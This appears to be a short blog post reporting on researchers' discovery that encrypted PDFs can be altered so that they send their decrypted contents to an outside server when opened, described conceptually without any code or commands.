Attack on encrypted PDFs exfiltrates clear text data

Here’s a quite clever hack…

German security researchers have found a way to exfiltrate the contents of encrypted PDF files without breaking their encryption.

Because the PDF file format allows for different parts of the same file to be either encrypted or unencrypted, it is possible to modify an unreadable encrypted file by adding some (clear text) code which sends the decrypted contents of the file to an Internet destination when the authorized user of the file enters the password and views the file. In some cases, no user interaction is required for the attack to trigger. Pretty nifty.

The PDF viewers that you and your coworkers are most likely to use are vulnerable to this kind of attack and it seems like this would be difficult to fix, since it takes advantage of a feature rather than a bug. It will be interesting to see how this plays out and whether real attackers take advantage of it.

Leave a Reply